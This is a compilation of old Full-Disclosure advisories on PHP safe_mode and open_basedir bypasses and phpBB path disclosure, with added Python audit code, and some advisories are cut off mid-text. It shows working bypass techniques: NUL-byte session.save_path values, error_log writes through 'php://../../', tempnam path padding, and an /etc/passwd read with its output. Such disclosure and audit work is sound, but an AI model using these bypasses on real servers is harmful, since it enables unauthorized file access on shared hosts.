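_HEADER_CHARSET = re.compile(r";\s*charset\s*=\s*\"?([A-Za-z0-9._:-]+)", re.I)
_META_CHARSET = re.compile(rb"<meta[^>]*charset\s*=\s*[\"']?([A-Za-z0-9._:-]+)", re.I)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status line, {header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def declared_charset(raw: bytes):
    """Return (charset, where) with where in {"header", "meta"}, or (None, None)."""
    _, headers, body = parse_response(raw)
    m = _HEADER_CHARSET.search(headers.get("content-type", ""))
    if m:
        return m.group(1).lower(), "header"
    m = _META_CHARSET.search(body)
    if m:
        return m.group(1).decode("ascii").lower(), "meta"
    return None, None


def needs_explicit_charset(raw: bytes) -> bool:
    """True when an HTML response leaves the encoding to browser sniffing,
    which is the precondition for the UTF-7 problem described above."""
    _, headers, _ = parse_response(raw)
    if not headers.get("content-type", "").lower().startswith("text/html"):
        return False
    return declared_charset(raw)[0] is None


if __name__ == "__main__":
    for name, resp in [("listing", LISTING_NO_CHARSET),
                       ("400 page", ERROR_WITH_CHARSET),
                       ("fixed listing", LISTING_FIXED_META)]:
        print(f"{name}: charset={declared_charset(resp)} "
              f"needs fix={needs_explicit_charset(resp)}")
```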

[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability

2007-06-27 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/45

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- - Written: 10.02.2007
- - Public: 27.06.2007

SecurityReason Research
SecurityAlert Id: 45

CVE: CVE-2007-3378
SecurityRisk: High

Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7
Advisory URL: http://securityreason.com/achievement_securityalert/45
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

 When using PHP as an Apache module, you can also change the configuration 
settings using directives in Apache configuration files (e.g. httpd.conf) and 
.htaccess files. You will need "AllowOverride Options" or "AllowOverride All" 
privileges to do so.


 php_value  name  value

Sets the value of the specified directive. Can be used only with 
PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value 
use none as the value.

Note: Don't use php_value to set boolean values. php_flag (see below) 
should be used instead. 

php_flag name on|off

Used to set a boolean configuration directive. Can be used only with 
PHP_INI_ALL and PHP_INI_PERDIR type directives. 

mail.force_extra_parameters - Force the addition of the specified 
parameters to be passed as extra parameters to the sendmail binary. These 
parameters will always replace the value of the 5th parameter to mail(), even 
in safe mode

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. htaccess safemode and open_basedir Bypass Vulnerability ---

When using PHP as an Apache module, you can also change the configuration 
settings using directives in the .htaccess file. These options are used by a lot of 
users to change permission options like display_errors etc. But it is 
possible to bypass safe_mode or open_basedir in different functions. For 
example, you can set session.save_path via .htaccess. In the functions 
session_save_path() and ini_set(), save_path is checked for safe_mode and 
open_basedir. In .htaccess this is bypassed: values from .htaccess are not 
checked.

For example:

cxib# ls -la /www/cxib/
total 14
drwxr-xr-x   3 cxib  www   512 Feb 16 20:20 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:07 ..
- -rw-r--r--   1 cxib  www53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/stars.php

cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:22:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 732
Content-Type: text/html


Warning:  session_save_path() [function.session-save-path]:
open_basedir restriction in effect. File(/inne) is not within the allowed
path(s): (/www) in /www/cxib/stars.php on line 2

Warning:  session_start() [function.session-start]: open_basedir
restriction in effect. File(/var/tmp/) is not within the allowed path(s):
(/www) in /www/cxib/stars.php on line 3

Fatal error:  session_start() [<a
href='function.session-start'>function.session-start</a>]: Failed to
initialize storage module: files (path: ) in /www/cxib/stars.php on
line 3

Connection closed by foreign host.
cxib#

So we can't create a session in that directory. But when we create a
.htaccess file, we can write there:

- ---
php_value session.save_path /inne
- ---

cxib# ls -la /www/cxib/
total 16
drwxr-xr-x   3 cxib  www   512 Feb 16 20:26 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:26 ..
- -rw-r--r--   1 cxib  www34 Feb 16 20:26 .htaccess
- -rw-r--r--   1 cxib  www53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/.htaccess
php_value session.save_path /inne
cxib# cat /www/cxib/stars.php


We can't set session.save_path via ini_set() or session_save_path().
Let's try sending a  request.

cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:30:42 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html

Connection closed by foreign host.
cxib#
cxib# ls -la /inne
total 3
drwxrwxrwx   2 root  wheel   512 Feb 16 20:30 .
drwxr-xr

[Full-disclosure] PHP 5.2.0 session.save_path safe_mode and open_basedir bypass

2006-12-08 Thread Maksymilian Arciemowicz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[PHP 5.2.0 session.save_path safe_mode and open_basedir bypass]


Author: Maksymilian Arciemowicz (SecurityReason)
Date:
- - Written: 02.10.2006
- - Public: 08.12.2006
SecurityAlert Id: 43
CVE: CVE-2006-6383
SecurityRisk: High
Affected Software: PHP 5.2.0
Advisory URL: http://securityreason.com/achievement_securityalert/43
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

A nice introduction to PHP by Stig Sather Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much  of the 
PHP Conference Material is freely available. 

Session support in PHP consists of a way to preserve certain data across 
subsequent accesses. This enables you to build more customized applications and 
increase the appeal of your web site.

A visitor accessing your web site is assigned a unique id, the so-called 
session id. This is either stored in a cookie on the user side or is propagated 
in the URL.

session.save_path defines the argument which is passed to the save handler. If 
you choose the default files handler, this is the path where the files are 
created. Defaults to /tmp. See also session_save_path().

There is an optional N argument to this directive that determines the number of 
directory levels your session files will be spread around in. For example, 
setting to '5;/tmp' may end up creating a session file and location like 
/tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you 
must create all of these directories before use. A small shell script exists in 
ext/session to do this, it's called mod_files.sh. Also note that if N is used 
and greater than 0 then automatic garbage collection will not be performed, see 
a copy of php.ini for further information. Also, if you use N, be sure to 
surround session.save_path in "quotes" because the separator (;) is also used 
for comments in php.ini. 

- --- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set with the ini_set() and session_save_path() functions. In 
session.save_path there must be the path where your tmp files will be saved. But the 
syntax for session.save_path can be:

[/PATH]

OR

[N;/PATH]

N - can be a string.

EXAMPLES:

1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")

and 

3. 
session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")


- -1477-1493--- Code from PHP520 ext/session/session.c [START]
PHP_FUNCTION(session_save_path)
{
    zval **p_name;
    int ac = ZEND_NUM_ARGS();
    char *old;

    if (ac < 0 || ac > 1 || zend_get_parameters_ex(ac, &p_name) == FAILURE)
        WRONG_PARAM_COUNT;

    old = estrdup(PS(save_path));

    if (ac == 1) {
        convert_to_string_ex(p_name);
        zend_alter_ini_entry("session.save_path", sizeof("session.save_path"), Z_STRVAL_PP(p_name), Z_STRLEN_PP(p_name), PHP_INI_USER, PHP_INI_STAGE_RUNTIME);
    }

    RETVAL_STRING(old, 0);
}
- -1477-1493--- Code from PHP520 ext/session/session.c [END]

Values are set in hash_memory (but before that, safe_mode and open_basedir 
check this value).
And if you are starting a session (for example with session_start()), the value from 
session.save_path is checked by the function PS_OPEN_FUNC(files).

- -242-300--- Code from PHP520 ext/session/mod_files.c [START]
PS_OPEN_FUNC(files)
{
    ps_files *data;
    const char *p, *last;
    const char *argv[3];
    int argc = 0;
    size_t dirdepth = 0;
    int filemode = 0600;

    if (*save_path == '\0') {
        /* if save path is an empty string, determine the temporary dir */
        save_path = php_get_temporary_directory();
    }

    /* split up input parameter */
    last = save_path;
    p = strchr(save_path, ';');
    while (p) {
        argv[argc++] = last;
        last = ++p;
        p = strchr(p, ';');
        if (argc > 1) break;
    }
    argv[argc++] = last;

    if (argc > 1) {
        errno = 0;
        dirdepth = (size_t) strtol(argv[0], NULL, 10);
        if (errno == ERANGE) {
            php_error(E_WARNING, "The first parameter in session.save_path is invalid");
            return FAILURE;
        }
    }

    if (argc > 2) {
        errno = 0;
        filemode = strtol(arg
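As an added example serving both this advisory and the PHP 5.2.3 .htaccess advisory above (it is not code from either): a Python audit that takes session.save_path values from .htaccess text, works out the directory PHP's files handler would actually open by splitting the value the way PS_OPEN_FUNC(files) does and stopping at an embedded NUL as a C string would, and checks that directory against open_basedir, which PHP itself does not do for .htaccess values. The sample .htaccess and the /www open_basedir are constructed from the values shown in the 5.2.3 advisory.

```python
import os
import re

# Matches php_value / php_admin_value lines that set session.save_path in an
# .htaccess or httpd.conf (the .htaccess form is the one PHP never checks).
_SAVE_PATH_DIRECTIVE = re.compile(
    r"^\s*php_(?:admin_)?value\s+session\.save_path\s+(\S.*?)\s*$", re.M)


def effective_save_dir(value: str) -> str:
    """Return the directory the 'files' handler would actually open.

    Mirrors PS_OPEN_FUNC(files) in mod_files.c: the C code sees the value as a
    NUL-terminated string, then splits on ';' into at most three fields
    (dirdepth, filemode, path); whatever remains after the second ';' is the
    path. A value validated as a length-aware PHP string can therefore differ
    from what is used here.
    """
    c_string = value.split("\0", 1)[0]
    return c_string.split(";", 2)[-1]


def split_open_basedir(open_basedir: str):
    """open_basedir on Unix is a ':'-separated list of prefixes."""
    return [os.path.normpath(p) for p in open_basedir.split(":") if p]


def within_basedir(path: str, basedirs) -> bool:
    """Directory-boundary containment check (lexical; a live audit would
    resolve symlinks with os.path.realpath first)."""
    # PHP itself treats each entry as a raw string prefix unless it ends in
    # '/', so this boundary check is the stricter of the two interpretations.
    norm = os.path.normpath(path)
    for base in basedirs:
        if norm == base or norm.startswith(base.rstrip("/") + "/"):
            return True
    return False


def audit_save_path_values(values, open_basedir: str):
    """Report every session.save_path value that would escape open_basedir
    or that carries an embedded NUL (so validated and used paths differ)."""
    basedirs = split_open_basedir(open_basedir)
    findings = []
    for raw in values:
        if "\0" in raw:
            findings.append(f"embedded NUL in session.save_path {raw!r}")
        used = effective_save_dir(raw)
        if not within_basedir(used, basedirs):
            findings.append(
                f"session.save_path would use {used!r}, outside open_basedir {open_basedir!r}")
    return findings


def audit_htaccess(text: str, open_basedir: str):
    """Extract session.save_path directives from .htaccess text and audit them."""
    return audit_save_path_values(_SAVE_PATH_DIRECTIVE.findall(text), open_basedir)


# Constructed sample .htaccess, modelled on the advisory's /www/cxib/.htaccess,
# audited against the open_basedir (/www) shown in its PHP warnings.
SAMPLE_HTACCESS = """\
php_flag display_errors on
php_value session.save_path /inne
"""

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE_HTACCESS, "/www"):
        print(finding)
```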

[Full-disclosure] PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()

2006-09-09 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/42

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]


Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- - Written: 05.09.2006
- - Public: 09.09.2006
SecurityAlert Id: 42
CVE: CVE-2006-4625
SecurityRisk: High
Affected Software: PHP 5.1.6 / 4.4.4 < = x
Advisory URL: http://securityreason.com/achievement_securityalert/42
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific 
features thrown in. The goal of the language is to allow web developers to 
write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much 
of the PHP Conference Material is freely available. 

php_admin_value  name  value

Sets the value of the specified directive. This can not be used in 
.htaccess files. Any directive type set with php_admin_value can 
not be overridden by .htaccess or virtualhost directives. To clear a previously 
set value use none as the value. 
php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in 
.htaccess files. Any directive type set with php_admin_flag 
can not be overridden by .htaccess or virtualhost directives. 

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. php_admin_value and php_admin_flag Bypass ---
When using PHP as an Apache module, you can also change the configuration 
settings using directives in Apache configuration files (e.g. 
httpd.conf). These options are used by a lot of ISPs to set open_basedir, 
safe_mode and more options.

For example:
open_basedir in httpd.conf

- ---

Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/

- ---

In PHP there are two config values: the Local Value and the Master Value. More in 
phpinfo() or ini_get().

Example:
If you have safe_mode or open_basedir (etc.) set in the Local Value for selected 
users and the Master Value is the default value, you can restore the 
Master Value over the Local Value with the ini_restore() function!

- ---
ini_restore

(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option
- ---

It restores the value from the php.ini file. Then your PHP options from httpd.conf are 
bypassed.

EXPLOIT:
- ---

- ---

RESULT OF EXPLOIT:
- ---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. 
File(/etc/passwd) is not within the allowed path(s): 
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php 
on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: 
Operation not permitted in 
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for 
inclusion (include_path='.:') in 
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # 
root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.
- ---

This issue is very dangerous, because the admin can't correctly set open_basedir or 
safe_mode for all users.

- --- 2. How to fix ---
fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.

http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, l5x

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards 
SecurityReason

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2

2006-06-25 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/41

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 10.6.2006
- -Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available.
error_log -- Send an error message somewhere.

- --- 1. error_log() Safe Mode Bypass ---
The error_log() function sends your error message to email, to a file, or displays it. You can 
send error messages by mail or write them into files. The issue is very simple. 
error_log() checks safe_mode and open_basedir in the stream function. But using a URL 
isn't allowed. And the problem exists with an incorrect filename.

PHP5:
- -2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {

        case 1: /*send an email */
            {
#if HAVE_SENDMAIL
                if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
                    return FAILURE;
                }
#else
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
                return FAILURE;
#endif
            }
            break;

        case 2: /*send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3: /*save to a file */
            stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
- -2013-2050---

Let's look at option 3.

- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
- -2038 line---

Option "a" writes the error to the file or, if the file doesn't exist, creates a new file. 
The problem is that in php_stream_open_wrapper() "IGNORE_URL" is defined.
IGNORE_URL turns off safe_mode if you use "prefix://../../".

- -Example---
cxib# php -r 'error_log("", 3, "/www/temp/sr.php");'

Warning: error_log(): SAFE MODE Restriction in effect.  The script whose uid is 
0 is not allowed to access /www/temp owned by uid 80 in Command line code on 
line 1

Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument 
in Command line code on line 1
cxib# php -r 'error_log("", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
- -rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib# 
- -Example---

- --- 2. Exploit ---
", 3, "php://../../".$file);
?>


- --- 3. How to fix ---
No response from the PHP Team. We reported this bug on 11.06.2006.

- --- 4. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com



[Full-disclosure] tempnam() Bypass unique file name PHP 5.1.4

2006-06-11 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/40

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[tempnam() Bypass unique file name PHP 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available.
tempnam -- Create file with unique file name.

- --- 1. tempnam() Bypass unique file name ---
In the latest advisory I published an issue "Open Basedir Bypass". The function 
tempnam() requires 2 arguments.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

In PHP 5.1.4 exists bug that allows you to create file with any name.

- ---
cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";'
/www/temp/hacker.phpGQMqSE 
- ---

You have created the file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically 
added to the filename.
The problem exists because the path couldn't be longer than MAXPATHLEN. The standard 
MAXPATHLEN is 1024B.

- -771-805---
PHP_FUNCTION(tempnam)
{
    zval **arg1, **arg2;
    char *d;
    char *opened_path;
    char *p;
    int fd;
    size_t p_len;

    if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) == FAILURE) {
        WRONG_PARAM_COUNT;
    }
    convert_to_string_ex(arg1);
    convert_to_string_ex(arg2);

    if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
        RETURN_FALSE;
    }

    d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));

    php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len TSRMLS_CC);
    if (p_len > 64) {
        p[63] = '\0';
    }

    if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) {
        close(fd);
        RETVAL_STRING(opened_path, 0);
    } else {
        RETVAL_FALSE;
    }
    efree(p);
    efree(d);
}
- -771-805---

So if you create a path like /www/../www/.. etc. such that

arg1+arg2=1023

the unique id is not added to the path.

Example:

- ---
cxib# php -r 'echo 
tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/",
 "hacker.php")."\n";'
/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/temp/hacker.php
- ---

= /www/temp/hacker.php

- ---
cxib# ls -la /www/temp/hacker*
- -rw---  1 cxib  cxib  0 May 22 23:33 /www/temp/hacker.php
- -rw---  1 cxib  cxib  0 May 22 23:26 /www/temp/hacker.phpGQMqSE
- ---


- --- 2. How to fix ---
CVS
h

[Full-disclosure] cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4

2006-05-27 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/39

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 15.5.2006
- -Public: 27.5.2006
from SECURITYREASON.COM
CVE-2006-2563

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write dynamically 
generated pages quickly.

A nice introduction to PHP by Stig Sather Bakken can be found at 
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the 
PHP Conference Material is freely available. 

The PHP safe mode is an attempt to solve the shared-server security problem. 
It is architecturally incorrect to try to solve this problem at the PHP 
level, but since the alternatives at the web server and OS levels aren't very 
realistic, many people, especially ISP's, use safe mode for now.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to 
connect and communicate to many different types of servers with many 
different types of protocols. libcurl currently supports the http, https, 
ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also supports 
HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this can also be done 
with PHP's ftp extension), HTTP form based upload, proxies, cookies, and 
user+password authentication.
These functions have been added in PHP 4.0.2. 

- --- 1. Safe Mode Bypass in cURL---
A general problem exists in the cURL functions: in safe_mode, 
0 strings (\x00) are changed to "_". The next bug exists in the file:// prefix, 
because safe_mode checks only the path at file:///.

Example:
- -Safe_Mode bypass exploit.1---

- -Safe_Mode bypass exploit.1---

Safe_mode checks access only to __FILE__. But cURL includes 
filethatyoudonthaveaccessto.php. So you can include any file from the directory 
where the script is.
But in this exploit, you can only read files from the directory where this 
script is. You can't use "/".

There is another concept for an exploit: if you have access to a 
directory (rights) where you want to read files. So, if you want to include 
files from "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php",
you should make a dir like
"/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/":

- -Safe_Mode bypass exploit.2---

- -Safe_Mode bypass exploit.2---

Safe mode checks access to the file
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php"

And cURL includes only 
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php"

because \x00 ends the path to the file.

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/

- --- 3. Greets ---

For: sp3x
and
p_e_a, l5x, Infospec, pi3, eax

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEd4bS3Ke13X/fTO4RAsCvAJ9eTxATfJRZZ2/DEoinl4R3Y+DZgACgvHQk
v8npsbXGJqmJRiAT9lnCyv8=
=mI80
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] phpBB 2.0.20 Full Path Disclosure and SQL Errors

2006-05-05 Thread Maksymilian Arciemowicz
Source: http://securityreason.com/achievement_securityalert/38

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 1.5.2006
- -Public: 5.5.2006

from SecurityReason.Com
CVE:
- - CVE-2006-2219 Full Path Disclosure
- - CVE-2006-2220 Sql Errors

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source 
bulletin board package. phpBB has a user-friendly interface, simple and 
straightforward administration panel, and helpful FAQ. Based on the powerful PHP 
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC 
database servers, phpBB is the ideal free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. Full Path Disclosure ---
Many scripts, for example phpBB, have a basic bug. It exists in variables 
which are passed into the script, into specific functions. For example the 
function htmlspecialchars():

...
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, 
&str_len, &quote_style, &hint_charset, &hint_charset_len) == FAILURE) {
return;
}
...

As you can see, there is protection against the format of the input variable. 
If the variable is anything other than a string, we get an error with Full Path 
Disclosure.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

- ---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
$mode = ( isset($HTTP_POST_VARS['mode']) ) ? 
htmlspecialchars($HTTP_POST_VARS['mode']) : 
htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
$mode = 'joined';
}
- ---Code ---

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in 
/www/2020/phpBB2/memberlist.php on line 40

Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output 
started at /www/2020/phpBB2/memberlist.php:40) in 
/www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

